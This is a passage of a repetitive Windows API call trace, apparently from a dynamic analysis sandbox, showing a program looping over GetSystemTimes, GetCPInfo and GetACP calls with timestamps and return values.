lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.812] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.812] GetACP () returned 0x4e4 [0130.812] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.812] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.812] GetACP () returned 0x4e4 [0130.813] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.813] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.813] GetACP () returned 0x4e4 [0130.813] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.813] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.813] GetACP () returned 0x4e4 [0130.813] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.813] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.813] GetACP () returned 0x4e4 [0130.813] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.813] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.813] GetACP () returned 0x4e4 [0130.813] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.813] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.813] GetACP () returned 0x4e4 [0130.813] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.813] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.813] GetACP () returned 0x4e4 [0130.813] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.813] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.813] GetACP () returned 0x4e4 [0130.813] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.813] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.813] GetACP () returned 0x4e4 [0130.813] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.813] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.814] GetACP () returned 0x4e4 [0130.814] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.814] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.814] GetACP () returned 0x4e4 [0130.814] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.814] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.814] GetACP () returned 0x4e4 [0130.814] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.814] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.814] GetACP () returned 0x4e4 [0130.814] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.814] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.814] GetACP () returned 0x4e4 [0130.814] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.814] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.814] GetACP () returned 0x4e4 [0130.814] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.814] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.814] GetACP () returned 0x4e4 [0130.814] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.814] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.814] GetACP () returned 0x4e4 [0130.814] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.814] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.814] GetACP () returned 0x4e4 [0130.814] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.815] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.815] GetACP () returned 0x4e4 [0130.815] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.815] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.815] GetACP () returned 0x4e4 [0130.815] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.815] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.815] GetACP () returned 0x4e4 [0130.815] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.815] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.815] GetACP () returned 0x4e4 [0130.815] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.815] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.815] GetACP () returned 0x4e4 [0130.815] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.815] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.815] GetACP () returned 0x4e4 [0130.815] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.815] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.815] GetACP () returned 0x4e4 [0130.815] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.815] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.815] GetACP () returned 0x4e4 [0130.815] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.815] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.815] GetACP () returned 0x4e4 [0130.815] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.816] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.816] GetACP () returned 0x4e4 [0130.816] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.816] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.816] GetACP () returned 0x4e4 [0130.816] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.816] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.816] GetACP () returned 0x4e4 [0130.816] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.816] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.816] GetACP () returned 0x4e4 [0130.816] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.816] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.816] GetACP () returned 0x4e4 [0130.816] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.816] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.816] GetACP () returned 0x4e4 [0130.816] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.816] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.816] GetACP () returned 0x4e4 [0130.816] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.816] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.816] GetACP () returned 0x4e4 [0130.816] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.816] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.816] GetACP () returned 0x4e4 [0130.816] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.817] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.817] GetACP () returned 0x4e4 [0130.817] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.817] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.817] GetACP () returned 0x4e4 [0130.817] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.817] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.817] GetACP () returned 0x4e4 [0130.817] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.817] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.817] GetACP () returned 0x4e4 [0130.817] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.817] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.817] GetACP () returned 0x4e4 [0130.817] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.817] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.817] GetACP () returned 0x4e4 [0130.817] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.817] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.817] GetACP () returned 0x4e4 [0130.817] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.817] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.817] GetACP () returned 0x4e4 [0130.817] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.817] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.817] GetACP () returned 0x4e4 [0130.818] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.818] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.818] GetACP () returned 0x4e4 [0130.818] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.818] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.818] GetACP () returned 0x4e4 [0130.818] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.818] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.818] GetACP () returned 0x4e4 [0130.818] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.818] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.818] GetACP () returned 0x4e4 [0130.818] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.818] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.818] GetACP () returned 0x4e4 [0130.818] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.818] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.818] GetACP () returned 0x4e4 [0130.818] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.818] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.818] GetACP () returned 0x4e4 [0130.818] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.818] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.818] GetACP () returned 0x4e4 [0130.818] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.819] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.819] GetACP () returned 0x4e4 [0130.819] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.819] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.819] GetACP () returned 0x4e4 [0130.819] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.819] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.819] GetACP () returned 0x4e4 [0130.819] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.819] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.819] GetACP () returned 0x4e4 [0130.819] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.819] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.819] GetACP () returned 0x4e4 [0130.819] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.819] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.819] GetACP () returned 0x4e4 [0130.819] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.819] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.819] GetACP () returned 0x4e4 [0130.819] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.819] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.819] GetACP () returned 0x4e4 [0130.819] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.819] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.819] GetACP () returned 0x4e4 [0130.820] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.820] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.820] GetACP () returned 0x4e4 [0130.820] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.820] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.820] GetACP () returned 0x4e4 [0130.820] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.820] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.820] GetACP () returned 0x4e4 [0130.820] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.820] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.820] GetACP () returned 0x4e4 [0130.820] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.820] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.820] GetACP () returned 0x4e4 [0130.820] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.820] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.820] GetACP () returned 0x4e4 [0130.820] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.820] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.820] GetACP () returned 0x4e4 [0130.820] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.820] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.820] GetACP () returned 0x4e4 [0130.820] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.821] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.821] GetACP () returned 0x4e4 [0130.821] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.821] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.821] GetACP () returned 0x4e4 [0130.821] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.821] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.821] GetACP () returned 0x4e4 [0130.821] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.821] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.821] GetACP () returned 0x4e4 [0130.821] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.821] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.821] GetACP () returned 0x4e4 [0130.821] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.821] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.821] 